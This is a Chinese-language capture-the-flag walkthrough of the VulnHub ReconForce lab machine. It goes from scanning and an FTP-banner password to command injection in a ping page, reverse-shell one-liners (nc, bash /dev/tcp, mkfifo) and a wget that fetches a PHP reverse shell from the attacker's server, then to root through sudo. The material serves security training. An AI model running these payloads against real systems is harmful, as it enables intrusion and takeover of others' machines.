ReconForce
作者:jason_huawen
靶机基本信息
名称:ReconForce (v1.1)
地址:
https://www.vulnhub.com/entry/hacknos-reconforce-v11,416/
识别目标主机IP地址
──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ sudo netdiscover -i eth1
Currently scanning: 172.26.164.0/16 | Screen View: Unique Hosts
5 Captured ARP Req/Rep packets, from 3 hosts. Total size: 300
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:e3:e8:c6 2 120 PCS Systemtechnik GmbH
192.168.56.170 08:00:27:c7:d4:69 2 120 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.170
NMAP扫描
用NMAP工具对目标主机进行全端口扫描:
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.170 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-16 22:03 EST
Nmap scan report for bogon (192.168.56.170)
Host is up (0.00017s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.206
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 6f96946572800893239020bc76dfb8ec (RSA)
| 256 6fbb491aa9b6e5008419a0e42bc457c4 (ECDSA)
|_ 256 ce3d9405f4a682c47f3fba371df623b0 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Recon_Web
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:C7:D4:69 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.31 seconds
NMAP扫描结果表明目标主机有3个开放端口:21(FTP)、22(SSH)、80(HTTP)
获得Shell
先来看目标主机上的21端口:
──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ ftp 192.168.56.170
Connected to 192.168.56.170.
220 "Security@hackNos".
Name (192.168.56.170:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||59422|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 117 4096 Jan 06 2020 .
drwxr-xr-x 2 0 117 4096 Jan 06 2020 ..
226 Directory send OK.
ftp> put test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||51089|)
550 Permission denied.
ftp>
对FTP服务的分析如下:
-
允许匿名访问
-
没有任何文件
-
匿名用户不能上传文件
-
这里需要尤其注意FTP返回的banner, 这有可能是用户名或者密码!!!
再来看80端口:
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ curl http://192.168.56.170
<!DOCTYPE HTML>
<html>
<head>
<title> Recon_Web</title>
<link rel="stylesheet" type="text/css" href="css/style.css">
</head>
<body>
<header>
<div class="main">
<div class="logo">
<img src="logo.png">
</div>
<ul>
<li><a href="#">Home</a></li>
<li><a href="https://www.reconforce.in" target="_blank">Service</a></li>
<li><a href="https://www.hacknos.com/os-hacknos-3-walkthrough-vulnhub-ctf/" target="_blank">Blog</a></li>>
</ul>
</div>
<div class="title">
<h1>hackNos</h1></div>
<div class="button">
<a href="5ecure/" class="btn">TroubleShoot</a>>
</div>
</header>
</body>
</html>
返回的页面中有链接5ecure,访问该链接,弹出HTTP基本认证窗口。
──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ nikto -h http://192.168.56.170
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.170
+ Target Hostname: 192.168.56.170
+ Target Port: 80
+ Start Time: 2022-12-16 22:28:39 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 294, size: 59bd0f09b74ac, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ 7917 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2022-12-16 22:29:34 (GMT-5) (55 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.41) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ gobuster dir -u http://192.168.56.170 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.170
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/16 22:30:08 Starting gobuster in directory enumeration mode
===============================================================
/css (Status: 301) [Size: 314] [--> http://192.168.56.170/css/]
/server-status (Status: 403) [Size: 279]
Progress: 219419 / 220561 (99.48%)===============================================================
2022/12/16 22:31:17 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ gobuster dir -u http://192.168.56.170 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.170
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: txt,html,sh,php
[+] Timeout: 10s
===============================================================
2022/12/16 22:31:32 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 660]
/css (Status: 301) [Size: 314] [--> http://192.168.56.170/css/]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1101939 / 1102805 (99.92%)===============================================================
2022/12/16 22:37:42 Finished
===============================================================
Gobuster工具没有扫描出任何目录或者文件,那继续看一下在5ecure目录下有无子目录或者文件:
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ gobuster dir -u http://192.168.56.170/5ecure -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.170/5ecure
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,txt,html,sh
[+] Timeout: 10s
===============================================================
2022/12/16 22:38:56 Starting gobuster in directory enumeration mode
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://192.168.56.170/5ecure/354f2192-e3f7-45d0-a2d1-4b07b1c267aa => 401 (Length: 461). To continue please exclude the status code or the length
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ gobuster dir --help | grep exclude
--exclude-length ints exclude the following content length (completely ignores the status). Supply multiple times to exclude multiple sizes.
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ gobuster dir -u http://192.168.56.170/5ecure -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh --exclude-lenght 461
Error: unknown flag: --exclude-lenght
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ gobuster dir -u http://192.168.56.170/5ecure -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh --exclude-length 461
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.170/5ecure
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] Exclude Length: 461
[+] User Agent: gobuster/3.3
[+] Extensions: php,txt,html,sh
[+] Timeout: 10s
===============================================================
2022/12/16 22:40:09 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
Progress: 1101538 / 1102805 (99.89%)===============================================================
2022/12/16 22:46:14 Finished
===============================================================
也没有任何收获,那接下来看能否破解/5ecure的登录信息:
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 80 -f 192.168.56.170 http-get /5ecure
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-12-16 22:52:48
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get://192.168.56.170:80/5ecure
[STATUS] 8741.00 tries/min, 8741 tries in 00:01h, 14335658 to do in 27:21h, 16 active
[STATUS] 8883.33 tries/min, 26650 tries in 00:03h, 14317749 to do in 26:52h, 16 active
^C^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
没有破解出来,其实Ftp登录时的banner有个信息为:
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ ftp 192.168.56.170
Connected to 192.168.56.170.
220 "Security@hackNos".
Name (192.168.56.170:kali): ^C
因此猜测密码为: Security@hackNos
登录/5ecure(用户名为admin)
登录成功为一个ping执行命令窗口,看有无命令注入漏洞:
127.0.0.1;ls 没有任何输出,说明有过滤机制
127.0.0.1&&ls 没有任何输出
127.0.0.1 || ls 发现有输出,输出结果为:
css
index.html
logo.png
out.php
接下来看能否反弹一个shell
nc -e /bin/bash '192.168.56.206' 5555
执行失败,没有得到shell
127.0.0.1;bash -i >& /dev/tcp/192.168.56.206/5555 0>&1
执行失败,没有得到shell
127.0.0.1||rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.206 5555 >/tmp/
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.170] 34278
id
which python
虽然得到目标主机的连接,但是执行命令没有反应。
由于cat命令没有被过滤,因此看一下目标主机有哪些过滤机制:
'',
';' => '',
'| ' => '',
'-' => '',
'$' => '',
'(' => '',
')' => '',
'`' => '',
'||' => '',
);
// Remove any of the charactars in the array (blacklist).
$target = str_replace( array_keys( $substitutions ), $substitutions, $target );
// Determine OS and execute the ping command.
if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
// Windows
$cmd = shell_exec( 'ping ' . $target );
}
else {
// *nix
$cmd = shell_exec( 'ping -c 4 ' . $target );
}
// Feedback for the end user
echo "
{$cmd}
";
}
?>
wget应该不会被过滤,因此可以将shell.php下载到目标主机:
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ cp ~/Toolsets/php-reverse-shell-1.0/php-reverse-shell.php .
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ ls
hydra.restore nmap_full_scan php-reverse-shell.php req.txt test.txt
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ mv php-reverse-shell.php shell.php
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ vim shell.php
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.56.170 - - [16/Dec/2022 23:16:58] "GET /shell.php HTTP/1.1" 200 -
在浏览器中输入:
127.0.0.1|| wget http://192.168.56.206:8000/shell.php
然后验证一下是否上传成功?
127.0.0.1|| ls
1
css
index.html
logo.png
out.php
shell.php
可以发现shell.php可以被成功上传,你接下来访问该shell.php文件,从而得到反弹的shell
http://192.168.56.170/5ecure/shell.php
在Kali Linux上成功得到反弹回来的shell
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.170] 34288
Linux hacknos 5.3.0-24-generic #26-Ubuntu SMP Thu Nov 14 01:33:18 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
12:19:44 up 1:26, 0 users, load average: 0.00, 0.02, 0.59
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@hacknos:/$ cd /home
cd /home
www-data@hacknos:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Jan 10 2020 .
drwxr-xr-x 20 root root 4.0K Jan 6 2020 ..
drwxr-xr-x 4 recon docker 4.0K Jan 10 2020 recon
www-data@hacknos:/home$ cd recon
cd recon
www-data@hacknos:/home/recon$ ls -alh
ls -alh
total 32K
drwxr-xr-x 4 recon docker 4.0K Jan 10 2020 .
drwxr-xr-x 3 root root 4.0K Jan 10 2020 ..
-rw------- 1 recon docker 0 Jan 10 2020 .bash_history
-rw-r--r-- 1 recon docker 220 May 5 2019 .bash_logout
-rw-r--r-- 1 recon docker 3.7K May 5 2019 .bashrc
drwx------ 2 recon docker 4.0K Jan 6 2020 .cache
drwx------ 3 recon docker 4.0K Jan 6 2020 .gnupg
-rw-r--r-- 1 recon docker 807 May 5 2019 .profile
-rw-r--r-- 1 recon docker 0 Jan 6 2020 .sudo_as_admin_successful
-rw-r--r-- 1 root root 87 Jan 10 2020 user.txt
www-data@hacknos:/home/recon$ cat user.txt
cat user.txt
###########################################
MD5HASH: bae11ce4f67af91fa58576c1da2aad4b
www-data@hacknos:/home/recon$
提权
www-data@hacknos:/home$ cd recon
cd recon
www-data@hacknos:/home/recon$ ls -alh
ls -alh
total 32K
drwxr-xr-x 4 recon docker 4.0K Jan 10 2020 .
drwxr-xr-x 3 root root 4.0K Jan 10 2020 ..
-rw------- 1 recon docker 0 Jan 10 2020 .bash_history
-rw-r--r-- 1 recon docker 220 May 5 2019 .bash_logout
-rw-r--r-- 1 recon docker 3.7K May 5 2019 .bashrc
drwx------ 2 recon docker 4.0K Jan 6 2020 .cache
drwx------ 3 recon docker 4.0K Jan 6 2020 .gnupg
-rw-r--r-- 1 recon docker 807 May 5 2019 .profile
-rw-r--r-- 1 recon docker 0 Jan 6 2020 .sudo_as_admin_successful
-rw-r--r-- 1 root root 87 Jan 10 2020 user.txt
www-data@hacknos:/home/recon$
可以看到recon用户有sudo 权限,前面admin的web登录用户密码会不会也是recon的密码呢,试一试!
www-data@hacknos:/home/recon$ su - recon
su - recon
Password: Security@hackNos
recon@hacknos:~$ id
id
uid=1000(recon) gid=119(docker) groups=119(docker),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lxd)
recon@hacknos:~$ sudo -l
sudo -l
[sudo] password for recon: Security@hackNos
Matching Defaults entries for recon on hacknos:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User recon may run the following commands on hacknos:
(ALL : ALL) ALL
recon@hacknos:~$ sudo /bin/bash
sudo /bin/bash
root@hacknos:/home/recon# cd /root
cd /root
root@hacknos:~# ls -alh
ls -alh
total 40K
drwx------ 6 root root 4.0K Jan 17 2020 .
drwxr-xr-x 20 root root 4.0K Jan 6 2020 ..
-rw------- 1 root root 0 Jan 10 2020 .bash_history
-rw-r--r-- 1 root root 3.1K Aug 27 2019 .bashrc
drwx------ 2 root root 4.0K Jan 17 2020 .cache
drwx------ 3 root root 4.0K Jan 17 2020 .gnupg
-rw-r--r-- 1 root root 148 Aug 27 2019 .profile
-rw-r--r-- 1 root root 876 Jan 10 2020 root.txt
drwxr-xr-x 3 root root 4.0K Jan 6 2020 snap
drwx------ 2 root root 4.0K Jan 6 2020 .ssh
-rw------- 1 root root 856 Jan 17 2020 .viminfo
root@hacknos:~# cat root.txt
cat root.txt
$$\ $$$$$$$\
\$$\ $$ __$$\
$$$$\ \$$\ $$ | $$ | $$$$$$\ $$$$$$$\ $$$$$$\ $$$$$$$\
\____| \$$\ $$$$$$$ |$$ __$$\ $$ _____|$$ __$$\ $$ __$$\
$$$$\ $$ | $$ __$$< $$$$$$$$ |$$ / $$ / $$ |$$ | $$ |
\____|$$ / $$ | $$ |$$ ____|$$ | $$ | $$ |$$ | $$ |
$$ / $$ | $$ |\$$$$$$$\ \$$$$$$$\ \$$$$$$ |$$ | $$ |
\__/ \__| \__| \_______| \_______| \______/ \__| \__|
MD5HASH: bae11ce4f67af91fa58576c1da2aad4b
Author: Rahul Gehlaut
WebBlog: www.hackNos.com
Twitter: @rahul_gehlaut
root@hacknos:~#
成功拿到root flag.
经验教训
-
在信息有限的情况下,尤其需要注意作者所给出的提示,比如本靶机中FTP的Banner信息,如果这个信息被遗漏,将没有办法继续进行后面的动作。
-
拿目标的shell,一方面可以通过执行命令,另一方面,也可以将shell.php脚本上传至目标主机。